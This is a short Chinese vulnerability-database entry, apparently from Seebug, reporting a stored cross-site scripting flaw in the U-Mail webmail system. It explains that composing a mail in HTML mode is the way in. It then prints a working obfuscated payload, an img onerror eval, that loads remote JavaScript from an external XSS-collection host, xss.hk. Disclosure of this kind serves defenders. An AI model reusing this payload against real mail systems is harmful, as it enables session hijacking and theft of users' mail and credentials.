U-Mail邮件系统存储型xss漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: U-Mail最新版某处处理不当,导致存储型xss漏洞 ### 详细说明: 打开邮箱,发信 [<img src="https://images.seebug.org/upload/201405/12223416e86b42094c4bfb4391eae7018ea06545.jpg" alt="dea73564-1f57-4d28-b8b3-eb19a9bbb716.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12223416e86b42094c4bfb4391eae7018ea06545.jpg) 编辑html代码,漏洞测试代码为 ``` <img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.hk%2FytcXRW%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//> ``` 测试结果 [<img src="https://images.seebug.org/upload/201405/12223455fdd9cfac96fd29fb080975cb87754b75.jpg" alt="2c8ee5df-acdb-4cd1-b4e9-548c3e5a8804.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12223455fdd9cfac96fd29fb080975cb87754b75.jpg) ### 漏洞证明: 如上详细说明

0%
暂无可用Exp或PoC
当前有0条受影响产品信息